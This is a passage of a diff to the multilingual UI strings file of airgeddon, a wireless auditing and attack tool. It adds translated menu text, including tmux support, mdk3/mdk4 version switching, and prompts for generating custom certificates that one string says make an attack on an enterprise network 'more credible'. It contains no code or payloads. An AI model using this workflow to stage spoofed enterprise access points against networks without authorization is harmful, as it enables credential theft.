poleceń. Więcej informacji na temat dostosowywania opcji w Wikiv" arr["GERMAN",626]="Ab airgeddon Version 9.20 wird tmux unterstützt und kann anstelle von xterm als Fenstermanager verwendet werden. Sie können das Skript in einer Umgebung ohne Grafiksystem von X-Fenstern starten, es wird nur für fortgeschrittene Benutzer empfohlen. Wie jede andere Option kann sie über das Optionsmenü konfiguriert werden, in der Optionsdatei ${rc_file} konfiguriert oder mit dem \"flag\" AIRGEDDON_WINDOWS_HANDLING in der Befehlszeile gestartet werden. Weitere Informationen zur Anpassung der Optionen im Wiki: ${urlgithub_wiki}/Options" - arr["TURKISH",626]="${pending_of_translation} airgeddon'un 9.20 sürümünden itibaren, tmux destekleniyor ve bir pencere yöneticisi olarak xterm yerine kullanılabilir. Senaryoyu X windows grafik sistemine sahip olmayan bir ortamda başlatabilirsiniz, sadece ileri düzey kullanıcılar için önerilir. Diğer seçeneklerde olduğu gibi, seçenekler menüsünden yapılandırılabilir, ${rc_file} seçenekler dosyasında yapılandırılabilir veya komut satırında \"flag\" AIRGEDDON_WINDOWS_HANDLING kullanılarak başlatılabilir. Wiki'deki seçeneklerin özelleştirilmesi hakkında daha fazla bilgi: ${urlgithub_wiki}/Options" + arr["TURKISH",626]="airgeddon'un 9.20 sürümünden itibaren, tmux destekleniyor ve bir pencere yöneticisi olarak xterm yerine kullanılabilir. Senaryoyu X windows grafik sistemine sahip olmayan bir ortamda başlatabilirsiniz, sadece ileri düzey kullanıcılar için önerilir. Diğer seçeneklerde olduğu gibi, seçenekler menüsünden yapılandırılabilir, ${rc_file} seçenekler dosyasında yapılandırılabilir veya komut satırında \"flag\" AIRGEDDON_WINDOWS_HANDLING kullanılarak başlatılabilir. Wiki'deki seçeneklerin özelleştirilmesi hakkında daha fazla bilgi: ${urlgithub_wiki}/Options" + + arr["ENGLISH",627]="certificates" + arr["SPANISH",627]="certificados" + arr["FRENCH",627]="certificats" + arr["CATALAN",627]="certificats" + arr["PORTUGUESE",627]="certificados" + arr["RUSSIAN",627]="сертификаты" + arr["GREEK",627]="${pending_of_translation} πιστοποιητικά" + arr["ITALIAN",627]="${pending_of_translation} certificati" + arr["POLISH",627]="${pending_of_translation} certyfikaty" + arr["GERMAN",627]="Zertifikate" + arr["TURKISH",627]="sertifikalar" + + arr["ENGLISH",628]="5. Create custom certificates" + arr["SPANISH",628]="5. Crear certificados personalizados" + arr["FRENCH",628]="5. Créer des certificats personnalisés" + arr["CATALAN",628]="5. Crear certificats personalitzats" + arr["PORTUGUESE",628]="5. Criar certificados personalizados" + arr["RUSSIAN",628]="5. Создать пользовательские сертификаты" + arr["GREEK",628]="${pending_of_translation} 5. Δημιουργία προσαρμοσμένων πιστοποιητικών" + arr["ITALIAN",628]="${pending_of_translation} 5. Crea certificati personalizzati" + arr["POLISH",628]="${pending_of_translation} 5. Twórz niestandardowe certyfikaty" + arr["GERMAN",628]="5. Benutzerdefinierte Zertifikate erstellen" + arr["TURKISH",628]="5. Özel sertifika oluştur" + + arr["ENGLISH",629]="Generating custom certificates, we will make our attack to an enterprise network more credible" + arr["SPANISH",629]="Generando certificados personalizados, haremos más creíble nuestro ataque a una red enterprise" + arr["FRENCH",629]="En générant des certificats personnalisés, notre attaque contre un réseau entreprise será plus crédible" + arr["CATALAN",629]="Generant certificats personalitzats, farem més creïble el nostre atac a una xarxa enterprise" + arr["PORTUGUESE",629]="Gerando certificados personalizados tornaremos o ataque a uma rede corporativa mais confiável" + arr["RUSSIAN",629]="Создавая собственные сертификаты, мы сделаем нашу атаку на корпоративную сеть более надёжной" + arr["GREEK",629]="${pending_of_translation} Δημιουργώντας προσαρμοσμένα πιστοποιητικά, θα κάνουμε την επίθεσή μας σε ένα επιχειρηματικό δίκτυο πιο αξιόπιστη" + arr["ITALIAN",629]="${pending_of_translation} Generando certificati personalizzati, renderemo più credibile il nostro attacco a una rete aziendale" + arr["POLISH",629]="${pending_of_translation} Generując niestandardowe certyfikaty, sprawimy, że nasz atak do sieci przedsiębiorstwa stanie się bardziej wiarygodny" + arr["GERMAN",629]="Indem wir benutzerdefinierte Zertifikate generieren, werden wir unseren Angriff auf ein Unternehmensnetzwerk glaubwürdiger machen" + arr["TURKISH",629]="Özel sertifikalar üreterek, kurumsal bir ağa saldırımızı daha güvenilir hale getireceğiz" + + arr["ENGLISH",630]="Enter two letter country code (US, ES, FR):" + arr["SPANISH",630]="Introduce las dos letras del código de país (US, ES, FR):" + arr["FRENCH",630]="Entrez les deux lettres du code de pays (US, ES, FR):" + arr["CATALAN",630]="Introduïu el codi de país de dues lletres (US, ES, FR):" + arr["PORTUGUESE",630]="Digite o código de duas letras do país (US, ES, FR):" + arr["RUSSIAN",630]="Введите двухбуквенный код страны (US, ES, FR):" + arr["GREEK",630]="${pending_of_translation} Εισαγάγετε τον κωδικό χώρας δύο χαρακτήρων (US, ES, FR):" + arr["ITALIAN",630]="${pending_of_translation} Inserisci il codice paese di due lettere (US, ES, FR):" + arr["POLISH",630]="${pending_of_translation} Wpisz dwuliterowy kod kraju (US, ES, FR):" + arr["GERMAN",630]="Den zweistelligen Ländercode eingeben (US, ES, FR):" + arr["TURKISH",630]="İki harfli ülke kodunu giriniz (US, ES, FR):" + + arr["ENGLISH",631]="Enter state or province (Madrid, New Jersey):" + arr["SPANISH",631]="Introduce el estado o provincia (Madrid, New Jersey):" + arr["FRENCH",631]="Entrez l'état ou la province (Madrid, New Jersey):" + arr["CATALAN",631]="Introduïu l’estat o la província (Madrid, New Jersey):" + arr["PORTUGUESE",631]="Digite o estado ou a província (Madrid, New Jersey):" + arr["RUSSIAN",631]="Введите штат или провинцию (Madrid, New Jersey):" + arr["GREEK",631]="${pending_of_translation} Πληκτρολογήστε κράτος ή επαρχία (Madrid, New Jersey):" + arr["ITALIAN",631]="${pending_of_translation} Entra nello stato o provincia (Madrid, New Jersey):" + arr["POLISH",631]="${pending_of_translation} Wpisz stan lub prowincję (Madrid, New Jersey):" + arr["GERMAN",631]="Bundesstaat oder Provinz eingeben (Madrid, New Jersey):" + arr["TURKISH",631]="Eyalet veya ilinizi giriniz (Madrid, New Jersey):" + + arr["ENGLISH",632]="Enter locale (Hong Kong, Dublin):" + arr["SPANISH",632]="Introduce el lugar (Hong Kong, Dublin):" + arr["FRENCH",632]="Entrez le lieu (Hong Kong, Dublin):" + arr["CATALAN",632]="Introduïu el lloc (Hong Kong, Dublin):" + arr["PORTUGUESE",632]="Digite a localidade (Hong Kong, Dublin):" + arr["RUSSIAN",632]="Введите язык (Hong Kong, Dublin):" + arr["GREEK",632]="${pending_of_translation} Εισάγετε locale (Hong Kong, Dublin):" + arr["ITALIAN",632]="${pending_of_translation} Inserisci locale (Hong Kong, Dublin):" + arr["POLISH",632]="${pending_of_translation} Wpisz ustawienia regionalne (Hong Kong, Dublin):" + arr["GERMAN",632]="Lokale eingeben (Hong Kong, Dublin):" + arr["TURKISH",632]="Yerel ayarı girin (Hong Kong, Dublin):" + + arr["ENGLISH",633]="Enter organization name (Evil Corp):" + arr["SPANISH",633]="Introduce el nombre de la empresa (Evil Corp):" + arr["FRENCH",633]="Entrez le nom de l'entreprise (Evil Corp):" + arr["CATALAN",633]="Introduïu el nom de l'organització (Evil Corp):" + arr["PORTUGUESE",633]="Digite o nome da organização (Evil Corp):" + arr["RUSSIAN",633]="Введите название организации (Evil Corp):" + arr["GREEK",633]="${pending_of_translation} Πληκτρολογήστε το όνομα του οργανισμού (Evil Corp):" + arr["ITALIAN",633]="${pending_of_translation} Inserire il nome dell'organizzazione (Evil Corp):" + arr["POLISH",633]="${pending_of_translation} Wpisz nazwę organizacji (Evil Corp):" + arr["GERMAN",633]="Organisationsname eingeben (Evil Corp):" + arr["TURKISH",633]="Kuruluş adını girin (Evil Corp):" + + arr["ENGLISH",634]="Enter email (tyrellwellick@ecorp.com):" + arr["SPANISH",634]="Introduce un correo electrónico (tyrellwellick@ecorp.com):" + arr["FRENCH",634]="Entrez l'email (tyrellwellick@ecorp.com):" + arr["CATALAN",634]="Introduïu el correu electrònic (tyrellwellick@ecorp.com):" + arr["PORTUGUESE",634]="Digite o email (tyrellwellick@ecorp.com):" + arr["RUSSIAN",634]="Введите адрес электронной почты (tyrellwellick@ecorp.com):" + arr["GREEK",634]="${pending_of_translation} Πληκτρολογήστε το email (tyrellwellick@ecorp.com):" + arr["ITALIAN",634]="${pending_of_translation} Inserisci l'email (tyrellwellick@ecorp.com):" + arr["POLISH",634]="${pending_of_translation} Wpisz adres e-mail (tyrellwellick@ecorp.com):" + arr["GERMAN",634]="E-Mail eingeben (tyrellwellick@ecorp.com):" + arr["TURKISH",634]="E-posta adresini girin (tyrellwellick@ecorp.com):" + + arr["ENGLISH",635]="Enter the \"common name\" (CN) for cert (ecorp.com):" + arr["SPANISH",635]="Introduce el \"common name\" (CN) del certificado (ecorp.com):" + arr["FRENCH",635]="Entrez le \"common name\" (CN) du certificat (ecorp.com):" + arr["CATALAN",635]="Introduïu \"common name\" (CN) per cert (ecorp.com):" + arr["PORTUGUESE",635]="Digite o \"common name\" (CN) para o certificado (ecorp.com):" + arr["RUSSIAN",635]="Введите \"common name\" (CN) для сертификата (ecorp.com):" + arr["GREEK",635]="${pending_of_translation} Πληκτρολογήστε \"common name\" (CN) για cert (ecorp.com):" + arr["ITALIAN",635]="${pending_of_translation} Inserisci \"common name\" (CN) per cert (ecorp.com):" + arr["POLISH",635]="${pending_of_translation} Wpisz \"common name\" (CN) dla cert (ecorp.com):" + arr["GERMAN",635]="Einen \"common name\" (CN) eingeben (ecorp.com):" + arr["TURKISH",635]="Bir \"common name\" (CN) girin (ecorp.com):" + + arr["ENGLISH",636]="There is an error in your configuration. Please check the ${rc_file} file. You have enabled the option to force the use of mdk3 (${normal_color}AIRGEDDON_MDK_VERSION${red_color}) but your system doesn't have mdk3 installed. Disable this option or install mdk3 to fix the problem" + arr["SPANISH",636]="Hay un error en tu configuración. Por favor revisa el fichero ${rc_file}. Has activado la opción para forzar el uso de mdk3 (${normal_color}AIRGEDDON_MDK_VERSION${red_color}) pero tu sistema no tiene mdk3 instalado. Deshabilita esta opción o instala mdk3 para solucionar el problema" + arr["FRENCH",636]="Il y a une erreur dans votre configuration. Veuillez vérifier le fichier ${rc_file}. Vous avez activé l'option pour forcer l'utilisation de mdk3 (${normal_color}AIRGEDDON_MDK_VERSION${red_color}) mais mdk3 n'est pas installé sur votre système. Désactivez cette option ou installez mdk3 pour résoudre le problème" + arr["CATALAN",636]="Hi ha un error en la configuració. Si us plau comprova el fitxer ${rc_file}. Has activat l'opció per forçar l'ús d'mdk3 (${normal_color}AIRGEDDON_MDK_VERSION${red_color}) però el teu sistema no té mdk3 instal·lat. Deshabilita aquesta opció o instal·la mdk3 per solucionar el problema" + arr["PORTUGUESE",636]="Existe um erro na sua configuração. Por favor, verifique o arquivo ${rc_file}. Você ativou a opção para forçar o uso de mdk3 (${normal_color}AIRGEDDON_MDK_VERSION${red_color}), mas seu sistema não possui o mdk3 instalado. Desabilite esta opção ou instale o mdk3 para resolver o problema" + arr["RUSSIAN",636]="В вашей конфигурации имеется ошибка. Пожалуйста, проверьте файл ${rc_file}. Вы включили опцию принудительного использования mdk3 (${normal_color}AIRGEDDON_MDK_VERSION${red_color}), но в вашей системе не установлена mdk3. Отключите эту опцию или установите mdk3, чтобы исправить проблему" + arr["GREEK",636]="${pending_of_translation} Υπάρχει ένα σφάλμα στο configuration σας. Ελέγξτε το αρχείο ${rc_file}. Έχετε ενεργοποιήσει την επιλογή που εξαναγκάζει τη χρήση του mdk3 (${normal_color}AIRGEDDON_MDK_VERSION${red_color}) και το σύστημά σας δεν έχει το έχει εγκατεστημένο (mdk3). Απενεργοποιήστε την επιλογή αυτή ή εγκαταστήστε το mdk3 για να επιλυθεί το πρόβλημα" + arr["ITALIAN",636]="${pending_of_translation} C'è un errore nella tua configurazione. Per favore controlla il file ${rc_file}. Hai attivato l'opzione per forzare l'uso di mdk3 (${normal_color}AIRGEDDON_MDK_VERSION${red_color}) ma il tuo sistema non ha mdk3 installato. Disabilita questa opzione o installa mdk3 per risolvere il problema" + arr["POLISH",636]="${pending_of_translation} Wystąpił błąd konfiguracji. Sprawdź plik ${rc_file}. Aktywowałeś opcję wymuszania użycia mdk3 (${normal_color}AIRGEDDON_MDK_VERSION${red_color}), ale twój system nie ma zainstalowanego mdk3. Wyłącz tę opcję lub zainstaluj mdk3, aby rozwiązać problem" + arr["GERMAN",636]="Ein Fehler wurde in Ihren Einstellungen gefunden. Bitte überprüfen Sie die Datei ${rc_file}. Sie haben die Option aktiviert, um die Verwendung von mdk3 zu erzwingen (${normal_color}AIRGEDDON_MDK_VERSION${red_color}), aber auf Ihrem System ist mdk3 nicht installiert. Deaktivieren Sie diese Option oder installieren Sie mdk3, um dieses Problem zu lösen" + arr["TURKISH",636]="Yapılandırmanızda bir hata var. Lütfen ${rc_file} dosyasını kontrol edin. (${normal_color}AIRGEDDON_MDK_VERSION${red_color}) mdk3 kullanımını zorlama seçeneğini etkinleştirdiniz, ancak sisteminizde mdk3 kurulu değil. Bu seçeneği devre dışı bırakın veya sorunu çözmek için mdk3 yükleyin" + + arr["ENGLISH",637]="11. Set mdk version to mdk3" + arr["SPANISH",637]="11. Cambiar versión mdk a mdk3" + arr["FRENCH",637]="11. Changer la version de mdk en mdk3" + arr["CATALAN",637]="11. Canviar versió mdk a mdk3" + arr["PORTUGUESE",637]="11. Mudar a versão do mdk para o mdk3" + arr["RUSSIAN",637]="11. Изменить версию mdk на mdk3" + arr["GREEK",637]="${pending_of_translation} 11. Αλλάξτε την έκδοση mdk στο mdk3" + arr["ITALIAN",637]="${pending_of_translation} 11. Cambia la versione di mdk in mdk3" + arr["POLISH",637]="${pending_of_translation} 11. Zmień wersję mdk na mdk3" + arr["GERMAN",637]="11. Die mdk-Version zu mdk3 wechseln" + arr["TURKISH",637]="11. mdk sürümünü mdk3 olarak değiştir" + + arr["ENGLISH",638]="11. Set mdk version to mdk4" + arr["SPANISH",638]="11. Cambiar versión mdk a mdk4" + arr["FRENCH",638]="11. Changer la version de mdk en mdk4" + arr["CATALAN",638]="11. Canviar versió mdk a mdk4" + arr["PORTUGUESE",638]="11. Mudar a versão do mdk para o mdk4" + arr["RUSSIAN",638]="11. Изменить версию mdk на mdk4" + arr["GREEK",638]="${pending_of_translation} 11. Αλλάξτε την έκδοση mdk στο mdk4" + arr["ITALIAN",638]="${pending_of_translation} 11. Cambia la versione di mdk in mdk4" + arr["POLISH",638]="${pending_of_translation} 11. Zmień wersję mdk na mdk4" + arr["GERMAN",638]="11. Die mdk-Version zu mdk4 wechseln" + arr["TURKISH",638]="11. mdk sürümünü mdk4 olarak değiştirin" + + arr["ENGLISH",639]="${blue_color}mdk version is going to be changed. ${green_color}Do you want to continue? ${normal_color}${visual_choice}" + arr["SPANISH",639]="${blue_color}Se va a cambiar la versión de mdk a utilizar. ${green_color}¿Deseas continuar? ${normal_color}${visual_choice}" + arr["FRENCH",639]="${blue_color}La version de mdk à utiliser va à changer. ${green_color}Voulez-vous continuer? ${normal_color}${visual_choice}" + arr["CATALAN",639]="${blue_color}Es canviarà la versió de mdk a utilitzar. ${green_color}¿Vols continuar? ${normal_color}${visual_choice}" + arr["PORTUGUESE",639]="${blue_color}A versão do mdk será modificada. ${green_color}Você deseja continuar? ${normal_color}${visual_choice}" + arr["RUSSIAN",639]="${blue_color}Это изменит версию mdk. ${green_color}Вы хотите продолжить? ${normal_color}${visual_choice}" + arr["GREEK",639]="${pending_of_translation} ${blue_color}Θα αλλάξει την έκδοση mdk που θα χρησιμοποιήσει. ${green_color}Θέλετε να συνεχίσετε; ${normal_color}${visual_choice}" + arr["ITALIAN",639]="${pending_of_translation} ${blue_color}Cambierà la versione di mdk da usare. ${green_color}Vuoi continuare? ${normal_color}${visual_choice}" + arr["POLISH",639]="${pending_of_translation} ${blue_color}Zmieni używaną wersję mdk. ${green_color}Czy chcesz kontynuować? ${normal_color}${visual_choice}" + arr["GERMAN",639]="${blue_color}Die zu verwendende mdk-Version wird geändert. ${green_color}Möchten Sie fortfahren? ${normal_color}${visual_choice}" + arr["TURKISH",639]="Kullanılacak mdk sürümünü değiştirilecek. ${green_color}Devam etmek istiyor musunuz? ${normal_color}${visual_choice}" + + arr["ENGLISH",640]="mdk version was successfully changed to ${mdk_command}" + arr["SPANISH",640]="Se ha cambiado correctamente la versión de mdk a ${mdk_command}" + arr["FRENCH",640]="La version de mdk en ${mdk_command} a été modifiée avec succès" + arr["CATALAN",640]="S'ha canviat correctament la versió de mdk a ${mdk_command}" + arr["PORTUGUESE",640]="Versão do mdk alterada para: ${mdk_command}" + arr["RUSSIAN",640]="Версия mdk для ${mdk_command} была успешно изменена" + arr["GREEK",640]="${pending_of_translation} Η έκδοση mdk στο ${mdk_command} άλλαξε με επιτυχία" + arr["ITALIAN",640]="${pending_of_translation} La versione mdk di ${mdk_command} è stata cambiata con successo" + arr["POLISH",640]="${pending_of_translation} Wersja mdk na ${mdk_command} została pomyślnie zmieniona" + arr["GERMAN",640]="Die mdk-Version wurde zu ${mdk_command} erfolgreich geändert" + arr["TURKISH",640]="mdk sürümü başarıyla ${mdk_command} olarak değiştirildi" + + arr["ENGLISH",641]="Selected mdk version: ${pink_color}${mdk_command}${normal_color}" + arr["SPANISH",641]="Versión mdk seleccionada: ${pink_color}${mdk_command}${normal_color}" + arr["FRENCH",641]="Version de mdk sélectionnée: ${pink_color}${mdk_command}${normal_color}" + arr["CATALAN",641]="Versió mdk seleccionada: ${pink_color}${mdk_command}${normal_color}" + arr["PORTUGUESE",641]="Versão do mdk selecionada: ${pink_color}${mdk_command}${normal_color}" + arr["RUSSIAN",641]="Выбрана версия mdk: ${pink_color}${mdk_command}${normal_color}" + arr["GREEK",641]="${pending_of_translation} Επιλεγμένη έκδοση mdk: ${pink_color}${mdk_command}${normal_color}" + arr["ITALIAN",641]="${pending_of_translation} Versione mdk selezionata: ${pink_color}${mdk_command}${normal_color}" + arr["POLISH",641]="${pending_of_translation} Wybrana wersja mdk: ${pink_color}${mdk_command}${normal_color}" + arr["GERMAN",641]="Ausgewählte mdk-Version: ${pink_color}${mdk_command}${normal_color}" + arr["TURKISH",641]="Seçilen mdk versiyonu: ${pink_color}${mdk_command}${normal_color}" + + arr["ENGLISH",642]="Certificates are being generated. Please be patient, the process can take some time..." + arr["SPANISH",642]="Se están generando los certificados. Por favor ten paciencia, el proceso puede tardar un rato..." + arr["FRENCH",642]="Les certificats sont en cours de génération. Soyez patient s'il vous plaît, le process peut prendre du temps..." + arr["CATALAN",642]="S'estan generant els certificats. Si us plau tingues paciència, el procés pot trigar una estona..." + arr["PORTUGUESE",642]="Os certificados estão sendo gerados. Por favor, seja paciente, o processo pode demorar um pouco..." + arr["RUSSIAN",642]="Сертификаты создаются. Пожалуйста, будьте терпеливы, процесс может занять некоторое время..." + arr["GREEK",642]="${pending_of_translation} Δημιουργούνται πιστοποιητικά. Παρακαλούμε να είστε υπομονετικοί, η διαδικασία μπορεί να διαρκέσει λίγο..." + arr["ITALIAN",642]="${pending_of_translation} I certificati vengono generati. Ti preghiamo di pazientare, il processo potrebbe richiedere del tempo..." + arr["POLISH",642]="${pending_of_translation} Generowane są certyfikaty. Prosimy o cierpliwość, proces może trochę potrwać..." + arr["GERMAN",642]="Zertifikate werden generiert. Bitte haben Sie etwas Geduld, der Vorgang kann eine Weile dauern..." + arr["TURKISH",642]="Sertifikalar üretiliyor. Lütfen sabırlı olun, işlem biraz zaman alabilir..." + + arr["ENGLISH",643]="Certificates files were created successfully, you should decide where to save them. ${green_color}Type the path to store the files or press [Enter] to accept the default proposal ${normal_color}[${enterprisecertspath}]" + arr["SPANISH",643]="Los ficheros de los certificados se han creado correctamente, hay que decidir donde guardarlos. ${green_color}Escribe la ruta donde guardaremos los ficheros o pulsa [Enter] para aceptar la propuesta por defecto ${normal_color}[${enterprisecertspath}]" + arr["FRENCH",643]="Les fichiers de certificat ont été créés correctement, vous devez décider où les enregistrer. ${green_color}Entrez le chemin où nous allons enregistrer les fichiers ou appuyez sur [Enter] pour accepter la proposition par défaut. ${normal_color}[${enterprisecertspath}]" + arr["CATALAN",643]="Els fitxers dels certificats s'han creat correctament, cal decidir on guardar-los. ${green_color}Escriu la ruta on guardarem els fitxers o prem [Enter] per acceptar la proposta per defecte ${normal_color}[${enterprisecertspath}]" + arr["PORTUGUESE",643]="Os certificados foram criados com êxito. Onde deseja salvá-los. ${green_color}Digite o caminho onde salvaremos os arquivos ou pressione [Enter] para aceitar o padrão ${normal_color}[${enterprisecertspath}]" + arr["RUSSIAN",643]="Файлы сертификатов были созданы правильно, вам нужно решить, где их сохранить. ${green_color}Введите путь, по которому мы будем сохранять файлы, или нажмите [Enter], чтобы принять предложение по умолчанию ${normal_color}[${enterprisecertspath}]" + arr["GREEK",643]="${pending_of_translation} Τα αρχεία πιστοποιητικών έχουν δημιουργηθεί σωστά, πρέπει να αποφασίσετε πού να τα αποθηκεύσετε. ${green_color}Πληκτρολογήστε τη διαδρομή στην οποία θα αποθηκεύσουμε τα αρχεία ή πατήστε [Enter] για να αποδεχθείτε την προεπιλεγμένη πρόταση ${normal_color}[${enterprisecertspath}]" + arr["ITALIAN",643]="${pending_of_translation} I file del certificato sono stati creati correttamente, devi decidere dove salvarli. ${green_color}Digita il percorso in cui salveremo i file o premi [Enter] per accettare la proposta predefinita ${normal_color}[${enterprisecertspath}]" + arr["POLISH",643]="${pending_of_translation} Pliki certyfikatów zostały utworzone poprawnie, musisz zdecydować, gdzie je zapisać. ${green_color}Wpisz ścieżkę, w której będziemy zapisywać pliki, lub naciśnij [Enter], aby zaakceptować domyślną propozycję ${normal_color}[${enterprisecertspath}]" + arr["GERMAN",643]="Die Zertifikatsdateien wurden erfolgreich erstellt. Sie müssen entscheiden, wo diese gespeichert werden sollen. ${green_color}Geben Sie den Pfad ein, in dem die Dateien gespeichert werden sollen, oder drücken Sie [Enter], um den Standardvorschlag zu akzeptieren. ${normal_color}[${enterprisecertspath}]" + arr["TURKISH",643]="Sertifika dosyaları başarılıyla oluşturuldu, nereye kaydedileceğine karar vermelisiniz. ${green_color}Dosyaları kaydedeceğimiz yolu yazın veya varsayılan teklifi kabul etmek için [Enter] tuşuna basın ${normal_color}[${enterprisecertspath}]" + + arr["ENGLISH",644]="Certificates (ca.pem, server.pem and server.key) were saved successfully to selected path [${normal_color}${enterprisecerts_completepath}${blue_color}]. The expiration time for these certificates is ${normal_color}10${blue_color} years and the password used on the creation process was \"${normal_color}${certspass}${blue_color}\"" + arr["SPANISH",644]="Los ficheros de los certificados (ca.pem, server.pem and server.key) se han salvado correctamente en la ruta elegida [${normal_color}${enterprisecerts_completepath}${blue_color}]. El tiempo de expiración para estos certificados es de ${normal_color}10${blue_color} años y la contraseña utilizada en su creación fue \"${normal_color}${certspass}${blue_color}\"" + arr["FRENCH",644]="Les fichiers de certificat (ca.pem, server.pem et server.key) ont été correctement enregistrés dans le chemin choisi [${normal_color}${enterprisecerts_completepath}${blue_color}]. Le temp d'expiration de ces certificats est de ${normal_color}10${blue_color} ans et le mot de passe utilisé lors de sa création était \"${normal_color}${certspass}${blue_color}\"" + arr["CATALAN",644]="Els fitxers dels certificats (ca.pem, server.pem and server.key) s'han salvat correctament en la ruta escollida [${normal_color}${enterprisecerts_completepath}${blue_color}]. El temps de termini per a aquests certificats és de ${normal_color}10${blue_color} anys i la contrasenya utilitzada en la seva creació va ser \"${normal_color}${certspass}${blue_color}\"" + arr["PORTUGUESE",644]="Os arquivos de certificados (ca.pem, server.pem e server.key) foram salvos corretamente no caminho escolhido [${normal_color}${enterprisecerts_completepath}${blue_color}]. O prazo de validade desses certificados é de ${normal_color}10${blue_color} anos e a senha usada em sua criação era \"${normal_color}${certspass}${blue_color} \"" + arr["RUSSIAN",644]="Файлы сертификатов (ca.pem, server.pem и server.key) были успешно сохранены по выбранному пути [${normal_color}${enterprisecerts_completepath}${blue_color}]. Срок действия этих сертификатов составляет ${normal_color}10${blue_color} лет, а пароль, использованный при их создании, был \"${normal_color} ${certspass} ${blue_color} \"" + arr["GREEK",644]="${pending_of_translation} τα αρχεία πιστοποιητικών (ca.pem, server.pem και server.key) αποθηκεύτηκαν σωστά στην επιλεγμένη διαδρομή [${normal_color}${enterprisecerts_completepath}${blue_color}}. Ο χρόνος λήξης αυτών των πιστοποιητικών είναι ${normal_color}10${blue_color} χρόνια και ο κωδικός πρόσβασης που χρησιμοποιήθηκε για τη δημιουργία του ήταν \"${normal_color}${certspass}${blue_color}\"" + arr["ITALIAN",644]="${pending_of_translation} i file del certificato (ca.pem, server.pem e server.key) sono stati salvati correttamente nel percorso scelto [${normal_color}${enterprisecerts_completepath}${blue_color}]. Il tempo di scadenza per questi certificati è ${normal_color}10${blue_color} anni e la password utilizzata nella sua creazione era \"${normal_color}${certspass}${blue_color}\"" + arr["POLISH",644]="${pending_of_translation} pliki certyfikatów (ca.pem, server.pem i server.key) zostały poprawnie zapisane w wybranej ścieżce [${normal_color}${enterprisecerts_completepath}${blue_color}]. Czas wygaśnięcia tych certyfikatów wynosi ${normal_color}10${blue_color} lat, a hasło użyte do jego utworzenia to \"${normal_color}${certspass}${blue_color}\"" + arr["GERMAN",644]="Die Zertifikatdateien (ca.pem, server.pem und server.key) wurden erfolgreich im ausgewählten Pfad [${normal_color}${enterprisecerts_completepath}${blue_color}] gespeichert. Die Gültigkeitsdauer für diese zertifikate beträgt ${normal_color}10${blue_color} Jahre und das bei der Erstellung verwendete Passwort war \"${normal_color}${certspass}${blue_color}\"" + arr["TURKISH",644]="Sertifika dosyaları (ca.pem, server.pem ve server.key) seçilen yola başarıyla kaydedildi [${normal_color}${enterprisecerts_completepath}${blue_color}]. Bu sertifikaların son kullanma süresi ${normal_color}10${blue_color} yıl ve oluşturmada kullanılan şifre \"${normal_color}${certspass}${blue_color}\" idi" + + arr["ENGLISH",645]="${green_color}Do you want to use custom certificates during the attack? ${blue_color}If you answer no \"n\", airgeddon will use ones by default. if you answer yes \"y\" then you will have to provide their path and know the password with which they were generated ${normal_color}${visual_choice}" + arr["SPANISH",645]="${green_color}¿Quieres utilizar certificados personalizados durante el ataque? ${blue_color}Si respondes no \"n\", airgeddon utilizará unos por defecto. Si respondes sí \"y\" entonces tendrás que proporcionar la ruta de los mismos y conocer la contraseña con la que fueron generados ${normal_color}${visual_choice}" + arr["FRENCH",645]="${green_color}Voulez-vous utiliser des certificats personnalisés pendant l'attaque? ${blue_color}Si vous répondez non \"n\", airgeddon les utilisera par défaut. Si vous répondez oui \"y\", vous devrez introduire leur chemin et connaître le mot de passe avec lequel ils ont été générés ${normal_color}${visual_choice}" + arr["CATALAN",645]="${green_color}Vols fer servir certificats personalitzats durant l'atac? ${blue_color}Si respons no \"n\", airgeddon utilitzarà uns per defecte. si respons sí \"y\" llavors hauràs de proporcionar la ruta dels mateixos i conèixer la contrasenya amb la qual van ser generats ${normal_color}${visual_choice}" + arr["PORTUGUESE",645]="${green_color}Você quer usar certificados personalizados durante o ataque? ${blue_color}Se você responder não \"n\", o airgeddon irá usar os padrões. Se você responder sim \"y\", então você terá que fornecer o caminho e saber a senha com a qual eles foram gerados ${normal_color}${visual_choice}" + arr["RUSSIAN",645]="${green_color}Хотите использовать собственные сертификаты во время атаки? ${blue_color}Если вы ответите нет \"n\", airgeddon будет использовать дефолтные сертификаты. Если вы ответите да \"y\", то вам нужно будет указать путь до ваших сертификатов и знать пароль, с помощью которого они были сгенерированы ${normal_color}${visual_choice}" + arr["GREEK",645]="${pending_of_translation} ${green_color}θέλετε να χρησιμοποιήσετε προσαρμοσμένα πιστοποιητικά κατά τη διάρκεια της επίθεσης; ${blue_color}Εάν απαντήσετε όχι \"n\", το airgeddon θα χρησιμοποιήσει αυτά από προεπιλογή. αν απαντήσετε ναι \"y\" τότε θα πρέπει να δώσετε τη διαδρομή τους και να γνωρίσετε τον κωδικό πρόσβασης με τον οποίο δημιουργήθηκαν ${normal_color}${visual_choice}" + arr["ITALIAN",645]="${pending_of_translation} ${green_color}Vuoi usare certificati personalizzati durante l'attacco? ${blue_color}Se rispondi no \"n\", airgeddon ne utilizzerà uno per impostazione predefinita. se rispondi sì \"y\" dovrai fornire il loro percorso e conoscere la password con cui sono stati generati ${normal_color}${visual_choice}" + arr["POLISH",645]="${pending_of_translation} ${green_color}Czy chcesz używać niestandardowych certyfikatów podczas ataku? ${blue_color}Jeśli odpowiesz nie \"n\", airgeddon będzie domyślnie używał tych. jeśli odpowiesz tak \"y\", będziesz musiał podać ich ścieżkę i znać hasło, z którego zostały wygenerowane ${normal_color}${visual_choice}" + arr["GERMAN",645]="${green_color}Möchten Sie während des Angriffs benutzerdefinierte Zertifikate verwenden? ${blue_color}Wenn sie mit Nein \"n\" antworten, verwendet airgeddon die Standardzertifikaten. wenn sie mit Ja \"y\" antworten, müssen Sie deren Pfad und das Kennwort eingeben, mit dem sie generiert wurden ${normal_color}${visual_choice}" + arr["TURKISH",645]="${green_color}Saldırı sırasında özel sertifikalar kullanmak ister misiniz? ${blue_color}Hayır \"n\" cevabını verirseniz, airgeddon varsayılanları kullanacaktır. eğer evet \"y\" cevabını verirseniz, yollarını belirtmeniz ve oluşturdukları şifreyi bilmeniz gerekir ${normal_color}${visual_choice}" + + arr["ENGLISH",646]="${blue_color}airgeddon has detected that custom certificates have been generated during this session. ${green_color}Do you want to use them during the attack? ${normal_color}${visual_choice}" + arr["SPANISH",646]="${blue_color}airgeddon ha detectado que han sido generados unos certificados personalizados durante esta sesión. ${green_color}¿Quieres utilizarlos durante el ataque? ${normal_color}${visual_choice}" + arr["FRENCH",646]="${blue_color}airgeddon a détecté que des certificats personnalisés ont été générés au cours de cette session. 